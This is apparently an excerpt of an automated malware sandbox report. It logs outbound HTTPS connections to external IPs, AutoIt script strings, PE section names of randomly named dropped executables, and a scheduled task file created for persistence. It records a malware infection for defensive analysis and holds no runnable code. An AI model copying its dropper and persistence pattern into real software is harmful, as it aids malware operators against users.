Source: unknown Network traffic detected: HTTP traffic on port 50311 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50296
Source: unknown Network traffic detected: HTTP traffic on port 50283 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50330
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50333
Source: unknown Network traffic detected: HTTP traffic on port 50319 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50263 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50234 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50343 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50320 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50305 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50328 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50347
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50349
Source: unknown Network traffic detected: HTTP traffic on port 50274 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50340
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50341
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50344
Source: unknown Network traffic detected: HTTP traffic on port 50352 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50243 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50343
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50346
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50345
Source: unknown Network traffic detected: HTTP traffic on port 50289 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50325 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50268 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50271 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50237 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50346 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50238
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50237
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50351
Source: unknown Network traffic detected: HTTP traffic on port 50317 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50350
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50232
Source: unknown Network traffic detected: HTTP traffic on port 50246 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50352
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50234
Source: unknown Network traffic detected: HTTP traffic on port 50351 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50236
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50235
Source: unknown Network traffic detected: HTTP traffic on port 50288 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50272 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50232 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50345 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50326 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50249
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 50312 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50280 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50249 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50243
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50242
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50245
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50244
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50246
Source: unknown Network traffic detected: HTTP traffic on port 50323 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50294 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 50235 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 50340 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50259
Source: unknown Network traffic detected: HTTP traffic on port 50296 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50253
Source: unknown Network traffic detected: HTTP traffic on port 50330 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50244 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50315 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50258
Source: unknown Network traffic detected: HTTP traffic on port 50324 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50350 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50238 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50309 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50347 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50253 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50304
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50305
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50307
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50309
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50263
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50262
Source: unknown Network traffic detected: HTTP traffic on port 50318 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50265
Source: unknown Network traffic detected: HTTP traffic on port 50282 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50264
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50302
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50268
Source: unknown Network traffic detected: HTTP traffic on port 50264 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50272
Source: unknown Network traffic detected: HTTP traffic on port 50285 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50271
Source: unknown Network traffic detected: HTTP traffic on port 50258 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50304 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50329 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50315
Source: unknown Network traffic detected: HTTP traffic on port 50313 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50317
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50316
Source: unknown Network traffic detected: HTTP traffic on port 50281 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50319
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50318
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50274
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50276
Source: unknown Network traffic detected: HTTP traffic on port 50262 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50311
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50277
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50313
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50312
Source: unknown Network traffic detected: HTTP traffic on port 50265 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50242 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50281
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50280
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50283
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50282
Source: unknown Network traffic detected: HTTP traffic on port 50259 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50236 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50307 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50341 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50349 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50326
Source: unknown Network traffic detected: HTTP traffic on port 50276 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50325
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50328
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50327
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50329
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50285
Source: unknown Network traffic detected: HTTP traffic on port 50245 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50316 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50320
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50289
Source: unknown Network traffic detected: HTTP traffic on port 50333 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50288
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50324
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50323
Source: unknown Network traffic detected: HTTP traffic on port 50290 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50290
Source: unknown Network traffic detected: HTTP traffic on port 50302 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50294
Source: unknown Network traffic detected: HTTP traffic on port 50327 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50344 -> 443
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50232 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50234 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50235 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50236 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50237 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50238 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50242 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50243 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50244 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50245 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50246 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50249 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50253 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50258 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50259 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50262 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50264 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50271 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50272 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50274 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50282 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:50285 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:50289 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50290 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50294 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50296 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50302 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50309 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:50313 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50316 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50325 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50326 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50329 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50328 version: TLS 1.2

System Summary

barindex
Source: 1dc3787ee3.exe, 0000000C.00000002.3003758072.0000000000D52000.00000002.00000001.01000000.00000010.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_edef38ff-7
Source: 1dc3787ee3.exe, 0000000C.00000002.3003758072.0000000000D52000.00000002.00000001.01000000.00000010.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_3e8ff0b3-6
Source: 1dc3787ee3.exe, 00000022.00000000.3145844996.0000000000D52000.00000002.00000001.01000000.00000010.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_ca22d2ae-6
Source: 1dc3787ee3.exe, 00000022.00000000.3145844996.0000000000D52000.00000002.00000001.01000000.00000010.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_12254833-6
Source: 1dc3787ee3.exe.8.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_6fc979a4-e
Source: 1dc3787ee3.exe.8.dr String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_b8512402-5
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: 1664VO856PFRR45SNXLF.exe.0.dr Static PE information: section name:
Source: 1664VO856PFRR45SNXLF.exe.0.dr Static PE information: section name: .idata
Source: NX5XML9A4AMIPXG5AGRT0AH025A0.exe.0.dr Static PE information: section name:
Source: NX5XML9A4AMIPXG5AGRT0AH025A0.exe.0.dr Static PE information: section name: .idata
Source: NX5XML9A4AMIPXG5AGRT0AH025A0.exe.0.dr Static PE information: section name:
Source: skotes.exe.4.dr Static PE information: section name:
Source: skotes.exe.4.dr Static PE information: section name: .idata
Source: skotes.exe.4.dr Static PE information: section name:
Source: random[1].exe.8.dr Static PE information: section name:
Source: random[1].exe.8.dr Static PE information: section name: .idata
Source: c1b0009d40.exe.8.dr Static PE information: section name:
Source: c1b0009d40.exe.8.dr Static PE information: section name: .idata
Source: random[1].exe0.8.dr Static PE information: section name:
Source: random[1].exe0.8.dr Static PE information: section name: .rsrc
Source: random[1].exe0.8.dr Static PE information: section name: .idata
Source: random[1].exe0.8.dr Static PE information: section name:
Source: 7a5878ed96.exe.8.dr Static PE information: section name:
Source: 7a5878ed96.exe.8.dr Static PE information: section name: .rsrc
Source: 7a5878ed96.exe.8.dr Static PE information: section name: .idata
Source: 7a5878ed96.exe.8.dr Static PE information: section name:
Source: DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe.9.dr Static PE information: section name:
Source: DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe.9.dr Static PE information: section name: .idata
Source: GCVLAW8OP2HD5YHJC3.exe.9.dr Static PE information: section name:
Source: GCVLAW8OP2HD5YHJC3.exe.9.dr Static PE information: section name: .idata
Source: GCVLAW8OP2HD5YHJC3.exe.9.dr Static PE information: section name:
Source: I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe.11.dr Static PE information: section name:
Source: I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe.11.dr Static PE information: section name: .idata
Source: 1QL5CL9NMBWTM5JDZ.exe.11.dr Static PE information: section name:
Source: 1QL5CL9NMBWTM5JDZ.exe.11.dr Static PE information: section name: .idata
Source: 1QL5CL9NMBWTM5JDZ.exe.11.dr Static PE information: section name:
Source: E7HQ3XMUO6VYIDJ3F2DE2.exe.25.dr Static PE information: section name:
Source: E7HQ3XMUO6VYIDJ3F2DE2.exe.25.dr Static PE information: section name: .idata
Source: EGCHWF62L351BCP5BKZSSW.exe.25.dr Static PE information: section name:
Source: EGCHWF62L351BCP5BKZSSW.exe.25.dr Static PE information: section name: .idata
Source: EGCHWF62L351BCP5BKZSSW.exe.25.dr Static PE information: section name:
Source: num[1].exe.8.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: num.exe.8.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Code function: 3_2_00E1C670 3_2_00E1C670
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Code function: 3_2_00E1B10F 3_2_00E1B10F
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Code function: 3_2_00E1C6BB 3_2_00E1C6BB
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Code function: 3_2_00E1C69B 3_2_00E1C69B
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C47E61 9_3_05C47E61
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C47E61 9_3_05C47E61
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C47E61 9_3_05C47E61
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C47E61 9_3_05C47E61
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C47E61 9_3_05C47E61
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C467A8 9_3_05C467A8
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C467A8 9_3_05C467A8
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C467A8 9_3_05C467A8
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C467A8 9_3_05C467A8
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C467A8 9_3_05C467A8
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C466F4 9_3_05C466F4
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C466F4 9_3_05C466F4
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C466F4 9_3_05C466F4
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C466F4 9_3_05C466F4
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C466F4 9_3_05C466F4
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C47E61 9_3_05C47E61
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C47E61 9_3_05C47E61
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C47E61 9_3_05C47E61
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C47E61 9_3_05C47E61
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C47E61 9_3_05C47E61
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C467A8 9_3_05C467A8
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C467A8 9_3_05C467A8
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C467A8 9_3_05C467A8
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C467A8 9_3_05C467A8
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C467A8 9_3_05C467A8
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C466F4 9_3_05C466F4
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C466F4 9_3_05C466F4
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C466F4 9_3_05C466F4
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C466F4 9_3_05C466F4
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C466F4 9_3_05C466F4
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C47E61 9_3_05C47E61
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C47E61 9_3_05C47E61
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C47E61 9_3_05C47E61
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C47E61 9_3_05C47E61
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C47E61 9_3_05C47E61
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C467A8 9_3_05C467A8
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C467A8 9_3_05C467A8
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C467A8 9_3_05C467A8
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C467A8 9_3_05C467A8
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C467A8 9_3_05C467A8
